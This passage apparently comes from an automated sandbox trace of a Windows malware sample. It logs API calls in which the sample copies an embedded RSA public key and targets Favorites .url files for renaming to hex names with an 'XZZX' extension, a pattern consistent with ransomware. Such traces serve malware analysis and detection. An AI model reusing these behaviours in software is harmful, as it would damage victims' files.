MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0260.089] lstrcpyW (in: lpString1=0x2baf460, lpString2="IE site on Microsoft.com.url" | out: lpString1="IE site on Microsoft.com.url") returned="IE site on Microsoft.com.url" [0260.089] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0260.089] SetErrorMode (uMode=0x1) returned 0x1 [0260.089] lstrcpyW (in: lpString1=0x2baf860, lpString2="IE site on Microsoft.com.url" | out: lpString1="IE site on Microsoft.com.url") returned="IE site on Microsoft.com.url" [0260.089] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xaa837b34, Data2=0x5752, Data3=0x4a9c, Data4=([0]=0x9f, [1]=0xcb, [2]=0x22, [3]=0x2f, [4]=0xf4, [5]=0x62, [6]=0x16, [7]=0x22))) returned 0x0 [0260.089] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 78 [0260.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0260.089] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\4CFC22A81972E9F8AA837B341C2DCE40.XZZX") returned 87 [0260.089] StrStrW (lpFirst="IE site on Microsoft.com.url", lpSrch="XZZX") returned 0x0 [0260.089] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url", dwFileAttributes=0x20) returned 0 [0260.090] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 1076 os_tid = 0x13e4 [0260.246] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0260.246] lstrcpyW (in: lpString1=0x2baf460, lpString2="Microsoft At Home.url" | out: lpString1="Microsoft At Home.url") returned="Microsoft At Home.url" [0260.246] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0260.246] SetErrorMode (uMode=0x1) returned 0x1 [0260.246] lstrcpyW (in: lpString1=0x2baf860, lpString2="Microsoft At Home.url" | out: lpString1="Microsoft At Home.url") returned="Microsoft At Home.url" [0260.246] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x317d5980, Data2=0xc88e, Data3=0x4bac, Data4=([0]=0xb3, [1]=0x82, [2]=0xc, [3]=0x33, [4]=0xd2, [5]=0x19, [6]=0x9f, [7]=0x56))) returned 0x0 [0260.246] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 71 [0260.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0260.246] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\6173A5003B485968317D59803E033DB0.XZZX") returned 87 [0260.246] StrStrW (lpFirst="Microsoft At Home.url", lpSrch="XZZX") returned 0x0 [0260.246] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url", dwFileAttributes=0x20) returned 0 [0260.246] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 1077 os_tid = 0x13e8 [0260.402] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0260.402] lstrcpyW (in: lpString1=0x2baf460, lpString2="Microsoft At Work.url" | out: lpString1="Microsoft At Work.url") returned="Microsoft At Work.url" [0260.402] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0260.402] SetErrorMode (uMode=0x1) returned 0x1 [0260.402] lstrcpyW (in: lpString1=0x2baf860, lpString2="Microsoft At Work.url" | out: lpString1="Microsoft At Work.url") returned="Microsoft At Work.url" [0260.402] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x91276766, Data2=0x18c3, Data3=0x41ad, Data4=([0]=0xbd, [1]=0xde, [2]=0xef, [3]=0xe4, [4]=0x70, [5]=0xa7, [6]=0x73, [7]=0xc))) returned 0x0 [0260.402] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 71 [0260.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0260.402] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\42B552B2065A3EC7912767660915230F.XZZX") returned 87 [0260.402] StrStrW (lpFirst="Microsoft At Work.url", lpSrch="XZZX") returned 0x0 [0260.402] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url", dwFileAttributes=0x20) returned 0 [0260.403] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 1078 os_tid = 0x13ec [0260.558] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0260.558] lstrcpyW (in: lpString1=0x2baf460, lpString2="Microsoft Store.url" | out: lpString1="Microsoft Store.url") returned="Microsoft Store.url" [0260.558] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0260.558] SetErrorMode (uMode=0x1) returned 0x1 [0260.558] lstrcpyW (in: lpString1=0x2baf860, lpString2="Microsoft Store.url" | out: lpString1="Microsoft Store.url") returned="Microsoft Store.url" [0260.558] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xb98fdeed, Data2=0x48c4, Data3=0x4c0b, Data4=([0]=0xab, [1]=0x3f, [2]=0x5, [3]=0x79, [4]=0x27, [5]=0xc4, [6]=0xb0, [7]=0x23))) returned 0x0 [0260.558] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 69 [0260.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0260.558] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\88D95574159D506CB98FDEED185834B4.XZZX") returned 87 [0260.558] StrStrW (lpFirst="Microsoft Store.url", lpSrch="XZZX") returned 0x0 [0260.558] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url", dwFileAttributes=0x20) returned 0 [0260.558] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 1079 os_tid = 0x13f0 [0260.720] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0260.720] lstrcpyW (in: lpString1=0x2baf460, lpString2="MSN Autos.url" | out: lpString1="MSN Autos.url") returned="MSN Autos.url" [0260.720] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" [0260.720] SetErrorMode (uMode=0x1) returned 0x1 [0260.720] lstrcpyW (in: lpString1=0x2baf860, lpString2="MSN Autos.url" | out: lpString1="MSN Autos.url") returned="MSN Autos.url" [0260.721] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x4ea3bfdc, Data2=0xbb65, Data3=0x4072, Data4=([0]=0xa7, [1]=0xaf, [2]=0xa7, [3]=0x10, [4]=0xf2, [5]=0x6d, [6]=0xd5, [7]=0xe1))) returned 0x0 [0260.721] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url") returned 57 [0260.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0260.721] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\A3C065CC2F2CB2FA4EA3BFDC31E79742.XZZX") returned 81 [0260.721] StrStrW (lpFirst="MSN Autos.url", lpSrch="XZZX") returned 0x0 [0260.721] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url", dwFileAttributes=0x20) returned 0 [0260.721] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 1080 os_tid = 0x13f4 [0260.870] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0260.870] lstrcpyW (in: lpString1=0x2baf460, lpString2="MSN Entertainment.url" | out: lpString1="MSN Entertainment.url") returned="MSN Entertainment.url" [0260.870] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" [0260.870] SetErrorMode (uMode=0x1) returned 0x1 [0260.870] lstrcpyW (in: lpString1=0x2baf860, lpString2="MSN Entertainment.url" | out: lpString1="MSN Entertainment.url") returned="MSN Entertainment.url" [0260.870] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x8f212649, Data2=0xf7bf, Data3=0x4917, Data4=([0]=0xa4, [1]=0x71, [2]=0x73, [3]=0xdf, [4]=0xf6, [5]=0xe3, [6]=0xbb, [7]=0x36))) returned 0x0 [0260.870] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 65 [0260.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0260.870] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\C5ABFF7746BBB9298F21264949769D71.XZZX") returned 81 [0260.870] StrStrW (lpFirst="MSN Entertainment.url", lpSrch="XZZX") returned 0x0 [0260.870] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url", dwFileAttributes=0x20) returned 0 [0260.870] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 1081 os_tid = 0x13f8 [0261.027] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0261.027] lstrcpyW (in: lpString1=0x2baf460, lpString2="MSN Money.url" | out: lpString1="MSN Money.url") returned="MSN Money.url" [0261.027] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" [0261.027] SetErrorMode (uMode=0x1) returned 0x1 [0261.027] lstrcpyW (in: lpString1=0x2baf860, lpString2="MSN Money.url" | out: lpString1="MSN Money.url") returned="MSN Money.url" [0261.028] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x2b864ea2, Data2=0x5c4f, Data3=0x4503, Data4=([0]=0xb5, [1]=0x35, [2]=0xbe, [3]=0x9a, [4]=0x97, [5]=0xcc, [6]=0x9c, [7]=0x3f))) returned 0x0 [0261.028] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url") returned 57 [0261.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0261.028] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\B2B47BFE18E25FED2B864EA21B9D4435.XZZX") returned 81 [0261.028] StrStrW (lpFirst="MSN Money.url", lpSrch="XZZX") returned 0x0 [0261.028] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url", dwFileAttributes=0x20) returned 0 [0261.028] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 1082 os_tid = 0x13fc [0261.182] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0261.182] lstrcpyW (in: lpString1=0x2baf460, lpString2="MSN Sports.url" | out: lpString1="MSN Sports.url") returned="MSN Sports.url" [0261.182] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" [0261.182] SetErrorMode (uMode=0x1) returned 0x1 [0261.182] lstrcpyW (in: lpString1=0x2baf860, lpString2="MSN Sports.url" | out: lpString1="MSN Sports.url") returned="MSN Sports.url" [0261.182] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x3016daf7, Data2=0x2ca6, Data3=0x4712, Data4=([0]=0x9b, [1]=0x7, [2]=0x2b, [3]=0x48, [4]=0x6f, [5]=0x2b, [6]=0xa7, [7]=0xd8))) returned 0x0 [0261.182] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url") returned 58 [0261.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0261.182] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\1C74702A0C652DAC3016DAF70F2011F4.XZZX") returned 81 [0261.182] StrStrW (lpFirst="MSN Sports.url", lpSrch="XZZX") returned 0x0 [0261.182] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url", dwFileAttributes=0x20) returned 0 [0261.182] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Process: id = "24" image_name = "bce1010314.exe" filename = "c:\\programdata\\bce1010314.exe" page_root = "0x7045000" os_pid = "0x560" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\ProgramData\\BCE1010314.exe\" " cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = 